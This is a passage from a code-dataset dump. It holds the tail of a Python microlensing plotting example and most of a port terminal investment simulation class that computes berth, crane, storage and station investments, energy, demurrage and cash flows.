't_E': t_E, 't_star': t_star})\nmethod = 'finite_source_uniform_Gould94'\nplens_model.set_magnification_methods([t_0-.05, method, t_0+.05])\n\n# Combine the data and model into an event\nevent_default = mm.Event(datasets=datasets_default, model=plens_model)\nevent_default.data_ref = 6\n\ngs = gridspec.GridSpec(2, 1, height_ratios=[5, 1])\n\n# Plot the data and model\nplt.figure()\nplt.subplot(gs[0])\nevent_default.plot_model(subtract_2450000=True)\nevent_default.plot_data(subtract_2450000=True)\nplt.title('Data and Fitted Model (Default)')\n# Plot the residuals\nplt.subplot(gs[1])\nevent_default.plot_residuals(subtract_2450000=True)\n\n# -----------------\n# Plot the data and model (customized)\ndatasets_custom = []\ncolor_list = ['black', 'red', 'yellow', 'green', 'cyan', 'blue', 'purple']\nfor (i, file_) in enumerate(sorted(files)):\n data = mm.MulensData(\n file_name=file_, comments=[\"\\\\\", \"|\"],\n plot_properties={\n 'color': color_list[i],\n 'label': os.path.basename(file_).split('_', maxsplit=2)[0]})\n datasets_custom.append(data)\n\nevent_custom = mm.Event(datasets=datasets_custom, model=plens_model)\n\nplt.figure()\nplt.subplot(gs[0])\nt_start = t_0 - 3.\nt_stop = t_0 + 1.\nevent_custom.plot_model(\n color='black', t_start=t_start, t_stop=t_stop, subtract_2450000=True)\nevent_custom.plot_data(marker='s', markersize=3, subtract_2450000=True)\nplt.ylim(17.5, 12.5)\nplt.xlim(t_start-2450000., t_stop-2450000.)\nplt.legend(loc='upper left')\nplt.title('Data and Fitted Model (Custom)')\n\n# Plot the residuals\nplt.subplot(gs[1])\nevent_custom.plot_residuals(marker='s', markersize=3, subtract_2450000=True)\nplt.xlim(t_start-2450000., t_stop-2450000.)\n\nplt.show()\n","sub_path":"examples/example_05_MB08310.py","file_name":"example_05_MB08310.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"423357799","text":"# package(s) for data handling\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# opentisim package\nfrom opentisim.agribulk_objects import *\nfrom opentisim import agribulk_defaults\n\n\nclass System:\n def __init__(self, startyear=2019, lifecycle=20, operational_hours=5840, debug=False, elements=[],\n crane_type_defaults=agribulk_defaults.mobile_crane_data, storage_type_defaults=agribulk_defaults.silo_data,\n allowable_berth_occupancy=0.4, allowable_dwelltime=18 / 365, allowable_station_occupancy=0.4):\n # time inputs\n self.startyear = startyear\n self.lifecycle = lifecycle\n self.operational_hours = operational_hours\n\n # provide intermediate outputs via print statements if debug = True\n self.debug = debug\n\n # collection of all terminal objects\n self.elements = elements\n\n # default values to use in case various types can be selected\n self.crane_type_defaults = crane_type_defaults\n self.storage_type_defaults = storage_type_defaults\n\n # triggers for the various elements (berth, storage and station)\n self.allowable_berth_occupancy = allowable_berth_occupancy\n self.allowable_dwelltime = allowable_dwelltime\n self.allowable_station_occupancy = allowable_station_occupancy\n\n # storage variables for revenue\n self.revenues = []\n\n # *** Simulation engine\n\n def simulate(self):\n \"\"\" Terminal investment strategy simulation\n\n This method automatically generates investment decisions, parametrically derived from overall demand trends and\n a number of investment triggers.\n\n Based on:\n - Ijzermans, W., 2019. Terminal design optimization. Adaptive agribulk terminal planning\n in light of an uncertain future. Master's thesis. Delft University of Technology, Netherlands.\n URL: http://resolver.tudelft.nl/uuid:7ad9be30-7d0a-4ece-a7dc-eb861ae5df24.\n - Van Koningsveld, M. and J. P. M. Mulder. 2004. Sustainable Coastal Policy Developments in the\n Netherlands. A Systematic Approach Revealed. Journal of Coastal Research 20(2), pp. 375-385\n\n Apply frame of reference style decisions while stepping through each year of the terminal\n lifecycle and check if investment is needed (in light of strategic objective, operational objective,\n QSC, decision recipe, intervention method):\n\n 1. for each year evaluate the demand of each commodity\n 2. for each year evaluate the various investment decisions\n 3. for each year calculate the energy costs (requires insight in realized demands)\n 4. for each year calculate the demurrage costs (requires insight in realized demands)\n 5. for each year calculate terminal revenues\n 6. collect all cash flows (capex, opex, revenues)\n 7. calculate PV's and aggregate to NPV\n\n \"\"\"\n\n # # 1. for each year evaluate the demand of each commodity\n # for year in range(self.startyear, self.startyear + self.lifecycle):\n # self.calculate_demand_commodity(year)\n\n # 2. for each year evaluate the various investment decisions\n for year in range(self.startyear, self.startyear + self.lifecycle):\n \"\"\"\n strategic objective: create a profitable enterprise (NPV > 0)\n operational objective: provide infrastructure of just sufficient quality\n \"\"\"\n\n if self.debug:\n print('')\n print('Simulate year: {}'.format(year))\n\n # estimate traffic from commodity scenarios\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n if self.debug:\n print(' Total vessel calls: {}'.format(total_calls))\n print(' Handysize calls: {}'.format(handysize))\n print(' Handymax calls: {}'.format(handymax))\n print(' Panamax calls: {}'.format(panamax))\n print(' Total cargo volume: {}'.format(total_vol))\n\n self.berth_invest(year, handysize, handymax, panamax)\n\n self.conveyor_quay_invest(year,agribulk_defaults.quay_conveyor_data)\n\n self.storage_invest(year, self.storage_type_defaults)\n\n self.conveyor_hinter_invest(year,agribulk_defaults.hinterland_conveyor_data)\n\n self.unloading_station_invest(year)\n\n # 3. for each year calculate the energy costs (requires insight in realized demands)\n for year in range(self.startyear, self.startyear + self.lifecycle):\n self.calculate_energy_cost(year)\n\n # 4. for each year calculate the demurrage costs (requires insight in realized demands)\n self.demurrage = []\n for year in range(self.startyear, self.startyear + self.lifecycle):\n self.calculate_demurrage_cost(year)\n\n # 5. for each year calculate terminal revenues\n self.revenues = []\n for year in range(self.startyear, self.startyear + self.lifecycle):\n self.calculate_revenue(year)\n\n # 6. collect all cash flows (capex, opex, revenues)\n cash_flows, cash_flows_WACC_real = self.add_cashflow_elements()\n\n # 7. calculate PV's and aggregate to NPV\n self.NPV()\n\n def calculate_revenue(self, year):\n \"\"\"\n 1. calculate the value of the total demand in year (demand * handling fee)\n 2. calculate the maximum amount that can be handled (service capacity * operational hours)\n Terminal.revenues is the minimum of 1. and 2.\n \"\"\"\n # implement a safetymarge\n quay_walls = len(self.find_elements(Quay_wall))\n crane_cyclic = len(self.find_elements(Cyclic_Unloader))\n crane_continuous = len(self.find_elements(Continuous_Unloader))\n conveyor_quay = len(self.find_elements(Conveyor_Quay))\n storage = len(self.find_elements(Storage))\n conveyor_hinter = len(self.find_elements(Conveyor_Hinter))\n station = len(self.find_elements(Unloading_station))\n\n if quay_walls < 1 and conveyor_quay < 1 and (\n crane_cyclic > 1 or crane_continuous > 1) and storage < 1 and conveyor_hinter < 1 and station < 1:\n safety_factor = 0\n else:\n safety_factor = 1\n\n # maize = Commodity(**agribulk_defaults.maize_data)\n # wheat = Commodity(**agribulk_defaults.wheat_data)\n # soybeans = Commodity(**dagribulk_efaults.soybean_data)\n #\n # maize_demand, wheat_demand, soybeans_demand = self.calculate_demand_commodity(year)\n\n # gather volumes from each commodity, calculate how much revenue it would yield, and add\n revenues = 0\n for commodity in self.find_elements(Commodity):\n fee = commodity.handling_fee\n try:\n volume = commodity.scenario_data.loc[commodity.scenario_data['year'] == year]['volume'].item()\n revenues += (volume * fee * safety_factor)\n except:\n pass\n if self.debug:\n print(' Revenues (demand): {}'.format(revenues))\n\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n\n # find the total service rate,\n service_rate = 0\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n if year >= element.year_online:\n service_rate += element.effective_capacity * crane_occupancy_online\n\n # find the rate between volume and throughput\n rate_throughput_volume = service_rate * self.operational_hours / total_vol\n\n if self.debug:\n print(' Revenues (throughput): {}'.format(\n int(service_rate * self.operational_hours * fee * safety_factor)))\n\n try:\n self.revenues.append(\n min(revenues * safety_factor, service_rate * self.operational_hours * fee * safety_factor))\n except:\n pass\n\n def calculate_energy_cost(self, year):\n \"\"\"\n 1. calculate the value of the total demand in year (demand * handling fee)\n 2. calculate the maximum amount that can be handled (service capacity * operational hours)\n Terminal.revenues is the minimum of 1. and 2.\n \"\"\"\n\n energy = Energy(**agribulk_defaults.energy_data)\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n station_occupancy_planned, station_occupancy_online = self.calculate_station_occupancy(year)\n\n # calculate crane energy\n list_of_elements_1 = self.find_elements(Cyclic_Unloader)\n list_of_elements_2 = self.find_elements(Continuous_Unloader)\n list_of_elements_Crane = list_of_elements_1 + list_of_elements_2\n\n for element in list_of_elements_Crane:\n if year >= element.year_online:\n consumption = element.consumption\n hours = self.operational_hours * crane_occupancy_online\n\n if consumption * hours * energy.price != np.inf:\n element.df.loc[element.df['year'] == year, 'energy'] = consumption * hours * energy.price\n\n else:\n element.df.loc[element.df['year'] == year, 'energy'] = 0\n\n # calculate Quay conveyor energy\n list_of_elements_quay = self.find_elements(Conveyor_Quay)\n\n for element in list_of_elements_quay:\n if year >= element.year_online:\n consumption = element.capacity_steps * element.consumption_coefficient + element.consumption_constant\n hours = self.operational_hours * crane_occupancy_online\n\n if consumption * hours * energy.price != np.inf:\n element.df.loc[element.df['year'] == year, 'energy'] = consumption * hours * energy.price\n\n else:\n element.df.loc[element.df['year'] == year, 'energy'] = 0\n\n # calculate storage energy\n list_of_elements_Storage = self.find_elements(Storage)\n\n for element in list_of_elements_Storage:\n if year >= element.year_online:\n consumption = element.consumption\n capacity = element.capacity\n hours = self.operational_hours\n\n if consumption * capacity * hours * energy.price != np.inf:\n element.df.loc[element.df['year'] == year, 'energy'] = consumption * capacity * hours * energy.price\n\n else:\n element.df.loc[element.df['year'] == year, 'energy'] = 0\n\n # calculate hinterland conveyor energy\n list_of_elements_hinter = self.find_elements(Conveyor_Hinter)\n\n for element in list_of_elements_hinter:\n if year >= element.year_online:\n consumption = element.capacity_steps * element.consumption_coefficient + element.consumption_constant\n hours = self.operational_hours * station_occupancy_online\n\n if consumption * hours * energy.price != np.inf:\n element.df.loc[element.df['year'] == year, 'energy'] = consumption * hours * energy.price\n\n else:\n element.df.loc[element.df['year'] == year, 'energy'] = 0\n\n # calculate hinterland station energy\n station_occupancy_planned, station_occupancy_online = self.calculate_station_occupancy(year)\n\n list_of_elements_Station = self.find_elements(Unloading_station)\n\n for element in list_of_elements_Station:\n if year >= element.year_online:\n\n if element.consumption * self.operational_hours * station_occupancy_online * energy.price != np.inf:\n element.df.loc[element.df['year'] == year, 'energy'\n ] = element.consumption * self.operational_hours * station_occupancy_online * energy.price\n\n else:\n element.df.loc[element.df['year'] == year, 'energy'] = 0\n\n def calculate_demurrage_cost(self, year):\n\n \"\"\"Find the demurrage cost per type of vessel and sum all demurrage cost\"\"\"\n\n handysize_calls, handymax_calls, panamax_calls, total_calls, total_vol = self.calculate_vessel_calls(year)\n\n factor, waiting_time_occupancy = self.waiting_time(year)\n\n # Find the service_rate per quay_wall to find the average service hours at the quay for a vessel\n quay_walls = len(self.find_elements(Quay_wall))\n\n service_rate = 0\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n if year >= element.year_online:\n service_rate += element.effective_capacity / quay_walls\n\n # Find the demurrage cost per type of vessel\n if service_rate != 0:\n handymax = Vessel(**agribulk_defaults.handymax_data)\n service_time_handymax = handymax.call_size / service_rate\n waiting_time_hours_handymax = factor * service_time_handymax\n port_time_handymax = waiting_time_hours_handymax + service_time_handymax + handymax.mooring_time\n penalty_time_handymax = max(0, waiting_time_hours_handymax - handymax.all_turn_time)\n demurrage_time_handymax = penalty_time_handymax * handymax_calls\n demurrage_cost_handymax = demurrage_time_handymax * handymax.demurrage_rate\n\n handysize = Vessel(**agribulk_defaults.handysize_data)\n service_time_handysize = handysize.call_size / service_rate\n waiting_time_hours_handysize = factor * service_time_handysize\n port_time_handysize = waiting_time_hours_handysize + service_time_handysize + handysize.mooring_time\n penalty_time_handysize = max(0, waiting_time_hours_handysize - handysize.all_turn_time)\n demurrage_time_handysize = penalty_time_handysize * handysize_calls\n demurrage_cost_handysize = demurrage_time_handysize * handysize.demurrage_rate\n\n panamax = Vessel(**agribulk_defaults.panamax_data)\n service_time_panamax = panamax.call_size / service_rate\n waiting_time_hours_panamax = factor * service_time_panamax\n port_time_panamax = waiting_time_hours_panamax + service_time_panamax + panamax.mooring_time\n penalty_time_panamax = max(0, waiting_time_hours_panamax - panamax.all_turn_time)\n demurrage_time_panamax = penalty_time_panamax * panamax_calls\n demurrage_cost_panamax = demurrage_time_panamax * panamax.demurrage_rate\n\n else:\n demurrage_cost_handymax = 0\n demurrage_cost_handysize = 0\n demurrage_cost_panamax = 0\n\n total_demurrage_cost = demurrage_cost_handymax + demurrage_cost_handysize + demurrage_cost_panamax\n\n self.demurrage.append(total_demurrage_cost)\n\n # *** Investment functions\n\n def berth_invest(self, year, handysize, handymax, panamax):\n \"\"\"\n Given the overall objectives of the terminal\n\n Decision recipe Berth:\n QSC: berth_occupancy\n Problem evaluation: there is a problem if the berth_occupancy > allowable_berth_occupancy\n - allowable_berth_occupancy = .40 # 40%\n - a berth needs:\n - a quay\n - cranes (min:1 and max: max_cranes)\n - berth occupancy depends on:\n - total_calls and total_vol\n - total_service_capacity as delivered by the cranes\n Investment decisions: invest enough to make the berth_occupancy < allowable_berth_occupancy\n - adding quay and cranes decreases berth_occupancy_rate\n \"\"\"\n\n # report on the status of all berth elements\n self.report_element(Berth, year)\n self.report_element(Quay_wall, year)\n self.report_element(Cyclic_Unloader, year)\n self.report_element(Continuous_Unloader, year)\n self.report_element(Conveyor_Quay, year)\n self.report_element(Storage, year)\n self.report_element(Conveyor_Hinter, year)\n self.report_element(Unloading_station, year)\n if self.debug:\n print('')\n print(' Start analysis:')\n\n # calculate berth occupancy\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n factor, waiting_time_occupancy = self.waiting_time(year)\n if self.debug:\n print(' Berth occupancy planned (@ start of year): {}'.format(berth_occupancy_planned))\n print(' Berth occupancy online (@ start of year): {}'.format(berth_occupancy_online))\n print(' Crane occupancy planned (@ start of year): {}'.format(crane_occupancy_planned))\n print(' Crane occupancy online (@ start of year): {}'.format(crane_occupancy_online))\n print(' waiting time factor (@ start of year): {}'.format(factor))\n print(' waiting time occupancy (@ start of year): {}'.format(waiting_time_occupancy))\n\n while berth_occupancy_planned > self.allowable_berth_occupancy:\n\n # add a berth when no crane slots are available\n if not (self.check_crane_slot_available()):\n if self.debug:\n print(' *** add Berth to elements')\n berth = Berth(**agribulk_defaults.berth_data)\n berth.year_online = year + berth.delivery_time\n self.elements.append(berth)\n\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n if self.debug:\n print(' Berth occupancy planned (after adding berth): {}'.format(berth_occupancy_planned))\n print(' Berth occupancy online (after adding berth): {}'.format(berth_occupancy_online))\n\n # check if a quay is needed\n berths = len(self.find_elements(Berth))\n quay_walls = len(self.find_elements(Quay_wall))\n if berths > quay_walls:\n length_v = max(agribulk_defaults.handysize_data[\"LOA\"],agribulk_defaults.handymax_data[\"LOA\"],\n agribulk_defaults.panamax_data[\"LOA\"]) # average size\n draft = max(agribulk_defaults.handysize_data[\"draft\"],agribulk_defaults.handymax_data[\"draft\"],\n agribulk_defaults.panamax_data[\"draft\"])\n # apply PIANC 2014:\n # see Ijzermans, 2019 - infrastructure.py line 107 - 111\n if quay_walls == 0:\n # - length when next quay is n = 1\n length = length_v + 2 * 15 # ref: PIANC 2014\n elif quay_walls == 1:\n # - length when next quay is n > 1\n length = 1.1 * berths * (length_v + 15) - (length_v + 2 * 15) # ref: PIANC 2014\n else:\n length = 1.1 * berths * (length_v + 15) - 1.1 * (berths - 1) * (length_v + 15)\n\n # - depth\n quay_wall = Quay_wall(**agribulk_defaults.quay_wall_data)\n depth = np.sum([draft, quay_wall.max_sinkage, quay_wall.wave_motion, quay_wall.safety_margin])\n self.quay_invest(year, length, depth)\n\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n if self.debug:\n print(' Berth occupancy planned (after adding quay): {}'.format(berth_occupancy_planned))\n print(' Berth occupancy online (after adding quay): {}'.format(berth_occupancy_online))\n\n # check if a crane is needed\n if self.check_crane_slot_available():\n self.crane_invest(year)\n\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n if self.debug:\n print(' Berth occupancy planned (after adding crane): {}'.format(berth_occupancy_planned))\n print(' Berth occupancy online (after adding crane): {}'.format(berth_occupancy_online))\n\n def quay_invest(self, year, length, depth):\n \"\"\"\n *** Decision recipe Quay: ***\n QSC: quay_per_berth\n problem evaluation: there is a problem if the quay_per_berth < 1\n investment decisions: invest enough to make the quay_per_berth = 1\n - adding quay will increase quay_per_berth\n - quay_wall.length must be long enough to accommodate largest expected vessel\n - quay_wall.depth must be deep enough to accommodate largest expected vessel\n - quay_wall.freeboard must be high enough to accommodate largest expected vessel\n \"\"\"\n\n if self.debug:\n print(' *** add Quay to elements')\n # add a Quay_wall element\n\n quay_wall = Quay_wall(**agribulk_defaults.quay_wall_data)\n\n # - capex\n unit_rate = int(quay_wall.Gijt_constant_2 * 2 * (depth + quay_wall.freeboard))\n mobilisation = int(max((length * unit_rate * quay_wall.mobilisation_perc), quay_wall.mobilisation_min))\n quay_wall.capex = int(length * unit_rate + mobilisation)\n\n # - opex\n quay_wall.insurance = unit_rate * length * quay_wall.insurance_perc\n quay_wall.maintenance = unit_rate * length * quay_wall.maintenance_perc\n quay_wall.year_online = year + quay_wall.delivery_time\n\n # add cash flow information to quay_wall object in a dataframe\n quay_wall = self.add_cashflow_data_to_element(quay_wall)\n\n self.elements.append(quay_wall)\n\n def crane_invest(self, year):\n \"\"\"current strategy is to add cranes as soon as a service trigger is achieved\n - find out how much service capacity is online\n - find out how much service capacity is planned\n - find out how much service capacity is needed\n - add service capacity until service_trigger is no longer exceeded\n \"\"\"\n if self.debug:\n print(' *** add Harbour crane to elements')\n # add unloader object\n if (self.crane_type_defaults[\"crane_type\"] == 'Gantry crane' or\n self.crane_type_defaults[\"crane_type\"] == 'Harbour crane' or\n self.crane_type_defaults[\"crane_type\"] == 'Mobile crane'):\n crane = Cyclic_Unloader(**self.crane_type_defaults)\n elif self.crane_type_defaults[\"crane_type\"] == 'Screw unloader':\n crane = Continuous_Unloader(**self.crane_type_defaults)\n\n # - capex\n unit_rate = crane.unit_rate\n mobilisation = unit_rate * crane.mobilisation_perc\n crane.capex = int(unit_rate + mobilisation)\n\n # - opex\n crane.insurance = unit_rate * crane.insurance_perc\n crane.maintenance = unit_rate * crane.maintenance_perc\n\n # labour\n labour = Labour(**agribulk_defaults.labour_data)\n '''old formula --> crane.labour = crane.crew * self.operational_hours / labour.shift_length '''\n crane.shift = ((crane.crew * self.operational_hours) / (\n labour.shift_length * labour.annual_shifts))\n crane.labour = crane.shift * labour.operational_salary\n\n # apply proper timing for the crane to come online (in the same year as the latest Quay_wall)\n years_online = []\n for element in self.find_elements(Quay_wall):\n years_online.append(element.year_online)\n crane.year_online = max([year + crane.delivery_time, max(years_online)])\n\n # add cash flow information to quay_wall object in a dataframe\n crane = self.add_cashflow_data_to_element(crane)\n\n # add object to elements\n self.elements.append(crane)\n\n def conveyor_quay_invest(self, year, agribulk_defaults_quay_conveyor_data):\n \"\"\"current strategy is to add conveyors as soon as a service trigger is achieved\n - find out how much service capacity is online\n - find out how much service capacity is planned\n - find out how much service capacity is needed\n - add service capacity until service_trigger is no longer exceeded\n \"\"\"\n\n # find the total service rate\n service_capacity = 0\n service_capacity_online = 0\n list_of_elements = self.find_elements(Conveyor_Quay)\n if list_of_elements != []:\n for element in list_of_elements:\n service_capacity += element.capacity_steps\n if year >= element.year_online:\n service_capacity_online += element.capacity_steps\n\n if self.debug:\n print(' a total of {} ton of quay conveyor service capacity is online; {} ton total planned'.format(\n service_capacity_online, service_capacity))\n\n # find the total service rate,\n service_rate = 0\n years_online = []\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n service_rate += element.peak_capacity\n years_online.append(element.year_online)\n\n # check if total planned capacity is smaller than target capacity, if so add a conveyor\n while service_capacity < service_rate:\n if self.debug:\n print(' *** add Quay Conveyor to elements')\n conveyor_quay = Conveyor_Quay(**agribulk_defaults_quay_conveyor_data)\n\n # - capex\n capacity = conveyor_quay.capacity_steps\n unit_rate = conveyor_quay.unit_rate_factor * conveyor_quay.length\n mobilisation = conveyor_quay.mobilisation\n conveyor_quay.capex = int(capacity * unit_rate + mobilisation)\n\n # - opex\n conveyor_quay.insurance = capacity * unit_rate * conveyor_quay.insurance_perc\n conveyor_quay.maintenance = capacity * unit_rate * conveyor_quay.maintenance_perc\n\n # labour\n labour = Labour(**agribulk_defaults.labour_data)\n conveyor_quay.shift = (\n (conveyor_quay.crew * self.operational_hours) / (labour.shift_length * labour.annual_shifts))\n conveyor_quay.labour = conveyor_quay.shift * labour.operational_salary\n\n # # apply proper timing for the crane to come online (in the same year as the latest Quay_wall)\n\n # there should always be a new crane in the planning\n new_crane_years = [x for x in years_online if x >= year]\n\n # find the maximum online year of Conveyor_Quay or make it []\n if self.find_elements(Conveyor_Quay) != []:\n max_conveyor_years = max([x.year_online for x in self.find_elements(Conveyor_Quay)])\n else:\n max_conveyor_years = []\n\n # decide what online year to use\n if max_conveyor_years == []:\n conveyor_quay.year_online = min(new_crane_years)\n elif max_conveyor_years < min(new_crane_years):\n conveyor_quay.year_online = min(new_crane_years)\n elif max_conveyor_years == min(new_crane_years):\n conveyor_quay.year_online = max(new_crane_years)\n elif max_conveyor_years > min(new_crane_years):\n conveyor_quay.year_online = max(new_crane_years)\n\n # add cash flow information to quay_wall object in a dataframe\n conveyor_quay = self.add_cashflow_data_to_element(conveyor_quay)\n\n self.elements.append(conveyor_quay)\n\n service_capacity += conveyor_quay.capacity_steps\n\n if self.debug:\n print(' a total of {} ton of conveyor quay service capacity is online; {} ton total planned'.format(\n service_capacity_online, service_capacity))\n\n def storage_invest(self, year, agribulk_defaults_storage_data):\n \"\"\"current strategy is to add storage as long as target storage is not yet achieved\n - find out how much storage is online\n - find out how much storage is planned\n - find out how much storage is needed\n - add storage until target is reached\n \"\"\"\n\n # from all storage objects sum online capacity\n storage_capacity = 0\n storage_capacity_online = 0\n list_of_elements = self.find_elements(Storage)\n if list_of_elements != []:\n for element in list_of_elements:\n if element.type == agribulk_defaults_storage_data['type']:\n storage_capacity += element.capacity\n if year >= element.year_online:\n storage_capacity_online += element.capacity\n\n if self.debug:\n print(' a total of {} ton of {} storage capacity is online; {} ton total planned'.format(\n storage_capacity_online, agribulk_defaults_storage_data['type'], storage_capacity))\n\n handysize, handymax, panamax, total_calls, total_vol = self.calculate_vessel_calls(year)\n berth_occupancy_planned, berth_occupancy_online, crane_occupancy_planned, crane_occupancy_online = self.calculate_berth_occupancy(\n year, handysize, handymax, panamax)\n\n max_vessel_call_size = max([x.call_size for x in self.find_elements(Vessel)])\n\n # find the total service rate,\n service_rate = 0\n for element in (self.find_elements(Cyclic_Unloader) + self.find_elements(Continuous_Unloader)):\n if year >= element.year_online:\n service_rate += element.effective_capacity * crane_occupancy_online\n\n storage_capacity_dwelltime = (\n service_rate * self.operational_hours * self.allowable_dwelltime) * 1.1 # IJzerman p.26\n\n # check if sufficient storage capacity is available\n while storage_capacity < max_vessel_call_size or storage_capacity < storage_capacity_dwelltime:\n if self.debug:\n print(' *** add storage to elements')\n\n # add storage object\n storage = Storage(**agribulk_defaults_storage_data)\n\n # - capex\n storage.capex = storage.unit_rate * storage.capacity + storage.mobilisation_min\n\n # - opex\n storage.insurance = storage.unit_rate * storage.capacity * storage.insurance_perc\n storage.maintenance = storage.unit_rate * storage.capacity * storage.maintenance_perc\n\n # labour**agribulk_defaults\n labour = Labour(**agribulk_defaults.labour_data)\n storage.shift = ((storage.crew * self.operational_hours) / (labour.shift_length * labour.annual_shifts))\n storage.labour = storage.shift * labour.operational_salary\n\n if year == self.startyear:\n storage.year_online = year + storage.delivery_time + 1\n else:\n storage.year_online = year + storage.delivery_time\n\n # add cash flow information to quay_wall object in a dataframe\n storage = self.add_cashflow_data_to_element(storage)\n\n self.elements.append(storage)\n\n storage_capacity += storage.capacity\n\n if self.debug:\n print(\n ' a total of {} ton of storage capacity is online; {} ton total planned'.format(\n storage_capacity_online,\n storage_capacity))\n\n def conveyor_hinter_invest(self, year, agribulk_defaults_hinterland_conveyor_data):\n \"\"\"current strategy is to add conveyors as soon as a service trigger is achieved\n - find out how much service capacity is online\n - find out how much service capacity is planned\n - find out how much service capacity is needed\n - add service capacity until service_trigger is no longer exceeded\n \"\"\"\n\n # find the total service rate\n service_capacity = 0\n service_capacity_online_hinter = 0\n list_of_elements_conveyor = self.find_elements(Conveyor_Hinter)\n if list_of_elements_conveyor != []:\n for element in list_of_elements_conveyor:\n service_capacity += element.capacity_steps\n if year >= element.year_online:\n service_capacity_online_hinter += element.capacity_steps\n\n if self.debug:\n print(\n ' a total of {} ton of conveyor hinterland service capacity is online; {} ton total planned'.format(\n service_capacity_online_hinter, service_capacity))\n\n # find the total service rate,\n service_rate = 0\n years_online = []\n for element in (self.find_elements(Unloading_station)):\n service_rate += element.production\n years_online.append(element.year_online)\n\n # check if total planned length is smaller than target length, if so add a quay\n while service_rate > service_capacity:\n if self.debug:\n print(' *** add Hinter Conveyor to elements')\n conveyor_hinter = Conveyor_Hinter(**agribulk_defaults_hinterland_conveyor_data)\n\n # - capex\n capacity = conveyor_hinter.capacity_steps\n unit_rate = conveyor_hinter.unit_rate_factor * conveyor_hinter.length\n mobilisation = conveyor_hinter.mobilisation\n conveyor_hinter.capex = int(capacity * unit_rate + mobilisation)\n\n # - opex\n conveyor_hinter.insurance = capacity * unit_rate * conveyor_hinter.insurance_perc\n conveyor_hinter.maintenance = capacity * unit_rate * conveyor_hinter.maintenance_perc\n\n # - labour\n labour = Labour(**agribulk_defaults.labour_data)\n conveyor_hinter.shift = (\n (conveyor_hinter.crew * self.operational_hours) / (labour.shift_length * labour.annual_shifts))\n conveyor_hinter.labour = conveyor_hinter.shift * labour.operational_salary\n\n # - online year\n conveyor_hinter.year_online = max(years_online)\n\n # add cash flow information to quay_wall object in a dataframe\n conveyor_hinter = self.add_cashflow_data_to_element(conveyor_hinter)\n\n self.elements.append(conveyor_hinter)\n\n service_capacity += conveyor_hinter.capacity_steps\n\n if self.debug:\n print(\n ' a total of {} ton of conveyor hinterland service capacity is online; {} ton total planned'.format(\n service_capacity_online_hinter, service_capacity))\n\n def unloading_station_invest(self, year):\n \"\"\"current strategy is to add unloading stations as soon as a service trigger is achieved\n - find out how much service capacity is online\n - find out how much service capacity is planned\n - find out how much service capacity is needed\n - add service capacity until service_trigger is no longer exceeded\n \"\"\"\n\n station_occupancy_planned, station_occupancy_online = self.calculate_station_occupancy(year)\n train_calls = self.train_call(year)\n\n if self.debug:\n print(' Station occupancy planned (@ start of year): {}'.format(station_occupancy_planned))\n print(' Station occupancy online (@ start of year): {}'.format(station_occupancy_online))\n print(' Number of trains (@start of year): {}'.format(train_calls))\n\n while station_occupancy_planned > self.allowable_station_occupancy:\n # add a station when station occupancy is too high\n if self.debug:\n print(' *** add station to elements')\n\n station = Unloading_station(**agribulk_defaults.hinterland_station_data)\n\n # - capex\n unit_rate = station.unit_rate\n mobilisation = station.mobilisation\n station.capex = int(unit_rate + mobilisation)\n\n # - opex\n station.insurance = unit_rate * station.insurance_perc\n station.maintenance = unit_rate * station.maintenance_perc\n\n # labour\n labour = Labour(**agribulk_defaults.labour_data)\n station.shift = ((station.crew * self.operational_hours) / (labour.shift_length * labour.annual_shifts))\n station.labour = station.shift * labour.operational_salary\n\n if year == self.startyear:\n station.year_online = year + station.delivery_time + 1\n else:\n station.year_online = year + station.delivery_time\n\n # add cash flow information to quay_wall object in a dataframe\n station = self.add_cashflow_data_to_element(station)\n\n self.elements.append(station)\n\n station_occupancy_planned, station_occupancy_online = self.calculate_station_occupancy(year)\n\n # *** Financial analyses\n\n def add_cashflow_elements(self):\n\n cash_flows = pd.DataFrame()\n labour = Labour(**agribulk_defaults.labour_data)\n\n # initialise cash_flows\n cash_flows['year'] = list(range(self.startyear, self.startyear + self.lifecycle))\n cash_flows['capex'] = 0\n cash_flows['maintenance'] = 0\n cash_flows['insurance'] = 0\n cash_flows['energy'] = 0\n cash_flows['labour'] = 0\n cash_flows['demurrage'] = self.demurrage\n cash_flows['revenues'] = self.revenues\n\n # add labour component for years were revenues are not zero\n cash_flows.loc[cash_flows[\n 'revenues'] != 0, 'labour'] = labour.international_staff * labour.international_salary + labour.local_staff * labour.local_salary\n\n for element in self.elements:\n if hasattr(element, 'df'):\n for column in cash_flows.columns:\n if column in element.df.columns and column != \"year\":\n cash_flows[column] += element.df[column]\n\n cash_flows.fillna(0)\n\n # calculate WACC real cashflows\n cash_flows_WACC_real = pd.DataFrame()\n cash_flows_WACC_real['year'] = cash_flows['year']\n for year in range(self.startyear, self.startyear + self.lifecycle):\n for column in cash_flows.columns:\n if column != \"year\":\n cash_flows_WACC_real.loc[cash_flows_WACC_real['year'] == year, column] = \\\n cash_flows.loc[\n cash_flows[\n 'year'] == year, column] / (\n (1 + self.WACC_real()) ** (\n year - self.startyear))\n\n return cash_flows, 